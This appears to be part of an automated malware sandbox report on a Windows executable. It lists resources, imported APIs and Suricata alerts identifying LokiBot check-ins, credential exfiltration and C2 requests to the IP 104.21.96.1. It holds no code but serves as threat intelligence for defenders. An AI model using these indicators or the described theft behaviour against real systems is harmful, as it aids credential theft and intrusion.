RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x1a6f4	data			1.0003786619380102
RT_GROUP_ICON	0xe9eac	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0xe9f24	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xe9f38	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xe9f4c	0x14	data	English	Great Britain	1.25
RT_VERSION	0xe9f60	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0xea03c	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Version Infos

Description	Data
Translation	0x0809 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-02-25T05:24:11.100054+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49704	104.21.96.1	80	TCP
2025-02-25T05:24:11.100054+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49704	104.21.96.1	80	TCP
2025-02-25T05:24:11.100054+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49704	104.21.96.1	80	TCP
2025-02-25T05:24:11.820982+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.5	49704	104.21.96.1	80	TCP
2025-02-25T05:24:13.065853+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49705	104.21.96.1	80	TCP
2025-02-25T05:24:13.065853+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49705	104.21.96.1	80	TCP
2025-02-25T05:24:13.065853+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49705	104.21.96.1	80	TCP
2025-02-25T05:24:13.815999+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.5	49705	104.21.96.1	80	TCP
2025-02-25T05:24:13.907230+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49706	104.21.96.1	80	TCP
2025-02-25T05:24:13.907230+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49706	104.21.96.1	80	TCP
2025-02-25T05:24:13.907230+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49706	104.21.96.1	80	TCP
2025-02-25T05:24:14.677464+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49706	104.21.96.1	80	TCP
2025-02-25T05:24:14.682527+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	49706	TCP
2025-02-25T05:24:15.830902+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49707	104.21.96.1	80	TCP
2025-02-25T05:24:15.830902+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49707	104.21.96.1	80	TCP
2025-02-25T05:24:15.830902+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49707	104.21.96.1	80	TCP
2025-02-25T05:24:16.568391+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49707	104.21.96.1	80	TCP
2025-02-25T05:24:16.573678+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	49707	TCP
2025-02-25T05:24:17.732481+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49708	104.21.96.1	80	TCP
2025-02-25T05:24:17.732481+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49708	104.21.96.1	80	TCP
2025-02-25T05:24:17.732481+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49708	104.21.96.1	80	TCP
2025-02-25T05:24:18.458451+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49708	104.21.96.1	80	TCP
2025-02-25T05:24:19.607817+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49709	104.21.96.1	80	TCP
2025-02-25T05:24:19.607817+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49709	104.21.96.1	80	TCP
2025-02-25T05:24:19.607817+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49709	104.21.96.1	80	TCP
2025-02-25T05:24:20.361372+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49709	104.21.96.1	80	TCP
2025-02-25T05:24:20.366406+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	49709	TCP
2025-02-25T05:24:21.513553+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49710	104.21.96.1	80	TCP
2025-02-25T05:24:21.513553+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49710	104.21.96.1	80	TCP
2025-02-25T05:24:21.513553+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49710	104.21.96.1	80	TCP
2025-02-25T05:24:22.255015+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49710	104.21.96.1	80	TCP
2025-02-25T05:24:22.260092+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	49710	TCP
2025-02-25T05:24:23.406015+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49718	104.21.96.1	80	TCP
2025-02-25T05:24:23.406015+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49718	104.21.96.1	80	TCP
2025-02-25T05:24:23.406015+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49718	104.21.96.1	80	TCP
2025-02-25T05:24:24.135502+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49718	104.21.96.1	80	TCP
2025-02-25T05:24:25.298458+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49733	104.21.96.1	80	TCP
2025-02-25T05:24:25.298458+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49733	104.21.96.1	80	TCP
2025-02-25T05:24:25.298458+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49733	104.21.96.1	80	TCP
2025-02-25T05:24:26.058592+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49733	104.21.96.1	80	TCP
2025-02-25T05:24:27.219618+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49750	104.21.96.1	80	TCP
2025-02-25T05:24:27.219618+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49750	104.21.96.1	80	TCP
2025-02-25T05:24:27.219618+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49750	104.21.96.1	80	TCP
2025-02-25T05:24:27.972135+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49750	104.21.96.1	80	TCP
2025-02-25T05:24:27.985771+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	49750	TCP
2025-02-25T05:24:29.234934+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49764	104.21.96.1	80	TCP
2025-02-25T05:24:29.234934+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49764	104.21.96.1	80	TCP
2025-02-25T05:24:29.234934+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49764	104.21.96.1	80	TCP
2025-02-25T05:24:30.002577+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49764	104.21.96.1	80	TCP
2025-02-25T05:24:30.007653+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	49764	TCP
2025-02-25T05:24:31.156773+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49775	104.21.96.1	80	TCP
2025-02-25T05:24:31.156773+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49775	104.21.96.1	80	TCP
2025-02-25T05:24:31.156773+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49775	104.21.96.1	80	TCP
2025-02-25T05:24:31.919364+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49775	104.21.96.1	80	TCP
2025-02-25T05:24:31.924500+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	49775	TCP
2025-02-25T05:24:33.109138+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49791	104.21.96.1	80	TCP
2025-02-25T05:24:33.109138+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49791	104.21.96.1	80	TCP
2025-02-25T05:24:33.109138+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49791	104.21.96.1	80	TCP
2025-02-25T05:24:33.812913+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49791	104.21.96.1	80	TCP
2025-02-25T05:24:34.969508+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49803	104.21.96.1	80	TCP
2025-02-25T05:24:34.969508+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49803	104.21.96.1	80	TCP
2025-02-25T05:24:34.969508+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49803	104.21.96.1	80	TCP
2025-02-25T05:24:35.717643+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49803	104.21.96.1	80	TCP
2025-02-25T05:24:35.722729+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	49803	TCP
2025-02-25T05:24:36.891694+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49818	104.21.96.1	80	TCP
2025-02-25T05:24:36.891694+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49818	104.21.96.1	80	TCP
2025-02-25T05:24:36.891694+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49818	104.21.96.1	80	TCP
2025-02-25T05:24:37.619452+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49818	104.21.96.1	80	TCP
2025-02-25T05:24:38.780753+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49830	104.21.96.1	80	TCP
2025-02-25T05:24:38.780753+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49830	104.21.96.1	80	TCP
2025-02-25T05:24:38.780753+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49830	104.21.96.1	80	TCP
2025-02-25T05:24:39.493477+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49830	104.21.96.1	80	TCP
2025-02-25T05:24:40.654333+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49845	104.21.96.1	80	TCP
2025-02-25T05:24:40.654333+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49845	104.21.96.1	80	TCP
2025-02-25T05:24:40.654333+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49845	104.21.96.1	80	TCP
2025-02-25T05:24:41.417009+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49845	104.21.96.1	80	TCP
2025-02-25T05:24:42.607102+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49858	104.21.96.1	80	TCP
2025-02-25T05:24:42.607102+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49858	104.21.96.1	80	TCP
2025-02-25T05:24:42.607102+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49858	104.21.96.1	80	TCP
2025-02-25T05:24:43.344638+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49858	104.21.96.1	80	TCP
2025-02-25T05:24:44.500110+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49872	104.21.96.1	80	TCP
2025-02-25T05:24:44.500110+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49872	104.21.96.1	80	TCP
2025-02-25T05:24:44.500110+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49872	104.21.96.1	80	TCP
2025-02-25T05:24:45.224511+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49872	104.21.96.1	80	TCP
2025-02-25T05:24:46.379957+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49885	104.21.96.1	80	TCP
2025-02-25T05:24:46.379957+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49885	104.21.96.1	80	TCP
2025-02-25T05:24:46.379957+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49885	104.21.96.1	80	TCP
2025-02-25T05:24:46.993722+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49885	104.21.96.1	80	TCP
2025-02-25T05:24:46.998807+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	49885	TCP
2025-02-25T05:24:48.157567+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49899	104.21.96.1	80	TCP
2025-02-25T05:24:48.157567+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49899	104.21.96.1	80	TCP
2025-02-25T05:24:48.157567+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49899	104.21.96.1	80	TCP
2025-02-25T05:24:48.884257+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49899	104.21.96.1	80	TCP
2025-02-25T05:24:50.062939+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49910	104.21.96.1	80	TCP
2025-02-25T05:24:50.062939+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49910	104.21.96.1	80	TCP
2025-02-25T05:24:50.062939+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49910	104.21.96.1	80	TCP
2025-02-25T05:24:50.775720+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49910	104.21.96.1	80	TCP
2025-02-25T05:24:51.944793+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49926	104.21.96.1	80	TCP
2025-02-25T05:24:51.944793+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49926	104.21.96.1	80	TCP
2025-02-25T05:24:51.944793+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49926	104.21.96.1	80	TCP
2025-02-25T05:24:52.670724+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49926	104.21.96.1	80	TCP
2025-02-25T05:24:53.828807+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49937	104.21.96.1	80	TCP
2025-02-25T05:24:53.828807+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49937	104.21.96.1	80	TCP
2025-02-25T05:24:53.828807+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49937	104.21.96.1	80	TCP
2025-02-25T05:24:54.581660+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49937	104.21.96.1	80	TCP
2025-02-25T05:24:54.587042+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	49937	TCP
2025-02-25T05:24:55.751903+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49953	104.21.96.1	80	TCP
2025-02-25T05:24:55.751903+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49953	104.21.96.1	80	TCP
2025-02-25T05:24:55.751903+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49953	104.21.96.1	80	TCP
2025-02-25T05:24:56.369453+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49953	104.21.96.1	80	TCP
2025-02-25T05:24:56.380157+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	49953	TCP
2025-02-25T05:24:57.564039+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49964	104.21.96.1	80	TCP
2025-02-25T05:24:57.564039+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49964	104.21.96.1	80	TCP
2025-02-25T05:24:57.564039+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49964	104.21.96.1	80	TCP
2025-02-25T05:24:58.311102+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49964	104.21.96.1	80	TCP
2025-02-25T05:24:58.316135+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.96.1	80	192.168.2.5	49964	TCP
2025-02-25T05:24:59.497837+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49976	104.21.96.1	80	TCP
2025-02-25T05:24:59.497837+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49976	104.21.96.1	80	TCP
2025-02-25T05:24:59.497837+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49976	104.21.96.1	80	TCP
2025-02-25T05:25:00.252248+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49976	104.21.96.1	80	TCP
